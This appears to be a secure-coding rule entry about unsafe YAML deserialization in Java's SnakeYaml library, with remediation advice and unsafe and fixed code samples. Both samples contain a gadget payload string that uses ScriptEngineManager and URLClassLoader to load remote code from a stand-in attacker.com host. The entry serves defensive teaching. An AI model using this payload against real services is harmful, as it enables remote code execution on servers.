Rule Definition
When user-controlled YAML streams are deserialized, then the attackers may gain access to execute arbitrary code on server and abuse logic of the application or may even lead to denial of service. The YAML serialization libraries converts object graphs into YAML formatted data and it may include the metadata which is necessary to reconstruct objects back from YAML stream. If the classes of the objects which are to be reconstructed are specified by the attackers and if they force the application to run arbitrary setters with user-controlled data, in this scenario the attacker may gain access to execute arbitrary code during deserialization of YAML stream. SnakeYaml is a widely-used YAML parser written in Java. A lesser-known feature of SnakeYaml is its support for a special syntax that allows the constructor of any Java class to be called when parsing YAML data.

Remediation
Always make sure to use only a Yaml instance that is constructed either with a SafeConstructor

Violation Code Sample

package yaml;
import org.yaml.snakeyaml.Yaml;

String malicious = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader "
 + "[[!!java.net.URL [\"http://attacker.com\"]]]]";
Yaml yaml = new Yaml(); // Unsafe instance of Yaml that allows any constructor to be called.

Object obj = yaml.load(malicious); // Make request to http://attacker.com

Fixed Code Sample

package yaml;
import org.yaml.snakeyaml.Yaml;

String malicious = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader "
 + "[[!!java.net.URL [\"http://attacker.com\"]]]]";
Yaml yaml = new Yaml(new SafeConstructor()); // using safe constructor

// or

Yaml yaml = new Yaml(new Constructor(SafeClass.class));

Object obj = yaml.load(malicious); // No request to http://attacker.com

https://cwe.mitre.org/data/definitions/502.html https://www.baeldung.com/java-snake-yaml